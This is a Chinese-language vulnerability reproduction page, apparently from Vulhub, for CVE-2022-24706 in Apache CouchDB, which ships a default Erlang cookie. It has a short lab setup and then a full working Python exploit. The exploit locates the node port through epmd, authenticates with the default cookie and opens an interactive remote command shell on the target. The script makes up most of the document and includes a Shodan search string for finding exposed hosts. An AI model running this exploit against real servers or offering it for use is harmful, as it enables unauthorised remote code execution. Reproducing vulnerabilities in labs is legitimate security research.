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181 lines
5.9 KiB
Markdown
181 lines
5.9 KiB
Markdown
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# Apache CouchDB 分布式协议代码执行 CVE-2022-24706
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Apache CouchDB是一个Erlang开发的NoSQL数据库。
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由于Erlang的特性,其支持分布式计算,分布式节点之间通过Erlang/OTP Distribution协议进行通信。攻击者如果知道通信时使用的Cookie,即可在握手包通过认证并执行任意命令。
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在CouchDB 3.2.1及以前版本中,使用了默认Cookie,值为“monster”。
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参考链接:
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- https://docs.couchdb.org/en/3.2.2-docs/cve/2022-24706.html
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- https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
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- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/erlang_cookie_rce.rb
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- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
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## 漏洞环境
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Vulhub执行如下命令启动一个Apache CouchDB 3.2.1服务:
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```
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docker-compose up -d
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```
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服务启动后,会监听三个端口:
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- 5984: Apache CouchDB Web管理接口
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- 4369: Erlang端口映射服务(epmd)
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- 9100: 集群节点通信和运行时自省服务(代码执行实际发生在这个端口中)
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其中,Web管理接口和epmd服务端口是固定的,而集群通信接口在Vulhub中是9100。实际环境下,这个端口通常是随机的,我们可以通过epmd服务来获取这个端口的数值。
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## 漏洞复现
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我们可以使用[这个POC](https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2022-24706/poc.py)来利用本漏洞。这个POC会先通过目标的4369端口epmd服务获取集群通信的端口,也就是9100,然后再使用默认Cookie来控制节点执行任意命令。
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```
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python poc.py target-ip 4369
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```
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## 漏洞POC
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- https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2022-24706/poc.py
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```python
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# Exploit Title: Remote Command Execution via Erlang Distribution Protocol
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# Date: 2022-01-21
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# Exploit Author: Konstantin Burov, @_sadshade
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# Software Link: https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
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# Version: N/A
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# Tested on: Kali 2021.2
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# Based on 1F98D's Erlang Cookie - Remote Code Execution
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# Shodan: port:4369 "name "
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# References:
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# https://www.exploit-db.com/exploits/49418
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# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
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# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
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#
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#
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#!/usr/local/bin/python3
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import socket
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from hashlib import md5
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import struct
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import sys
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import re
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import time
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TARGET = sys.argv[1]
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EPMD_PORT = int(sys.argv[2]) # Default Erlang distributed port
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COOKIE = "monster" # Default Erlang cookie for CouchDB
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ERLNAG_PORT = 0
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EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
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# Some data:
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NAME_MSG = b"\x00\x15n\x00\x05\x00\x07\x49\x9cAAAAAA@AAAAAAA"
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CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
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CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
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CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
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def compile_cmd(CMD):
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MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
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MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
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MSG += struct.pack(">H", len(CMD))
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MSG += bytes(CMD, 'ascii')
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MSG += b'jw\x04user'
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PAYLOAD = b'\x70' + CTRL_DATA + MSG
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PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
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return PAYLOAD
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print("Remote Command Execution via Erlang Distribution Protocol.\n")
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# Connect to EPMD:
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try:
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epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
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epm_socket.connect((TARGET, EPMD_PORT))
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except socket.error as msg:
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print("Couldnt connect to EPMD: %s\n terminating program" % msg)
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sys.exit(1)
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epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
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if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
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data = epm_socket.recv(1024)
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data = data[0:len(data) - 1].decode('ascii')
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data = data.split("\n")
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if len(data) == 1:
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choise = 1
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print("Found " + data[0])
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else:
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print("\nMore than one node found, choose which one to use:")
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line_number = 0
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for line in data:
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line_number += 1
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print(" %d) %s" %(line_number, line))
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choise = int(input("\n> "))
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ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
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else:
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print("Node list request error, exiting")
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sys.exit(1)
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epm_socket.close()
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# Connect to Erlang port:
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try:
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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
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s.connect((TARGET, ERLNAG_PORT))
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except socket.error as msg:
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print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
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sys.exit(1)
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s.send(NAME_MSG)
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s.recv(5)
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challenge = s.recv(1024) # Receive "challenge" message
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print(challenge)
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challenge = struct.unpack(">I", challenge[9:13])[0]
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#print("Extracted challenge: {}".format(challenge))
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# Add Challenge Digest
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CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
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+ bytes(str(challenge), "ascii")).digest()
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s.send(CHALLENGE_REPLY)
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CHALLENGE_RESPONSE = s.recv(1024)
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if len(CHALLENGE_RESPONSE) == 0:
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print("Authentication failed, exiting")
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sys.exit(1)
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print("Authentication successful")
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print("Enter command:\n")
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data_size = 0
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while True:
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if data_size <= 0:
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CMD = input("> ")
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if not CMD:
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continue
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elif CMD == "exit":
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sys.exit(0)
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s.send(compile_cmd(CMD))
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data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
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s.recv(45) # Control message
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data_size -= 45 # Data size without control message
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time.sleep(0.1)
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elif data_size < 1024:
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data = s.recv(data_size)
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#print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
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time.sleep(0.1)
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print(data[3:].decode())
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data_size = 0
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else:
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data = s.recv(1024)
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#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
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time.sleep(0.1)
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print(data[4:].decode())
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data_size -= 1024
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```
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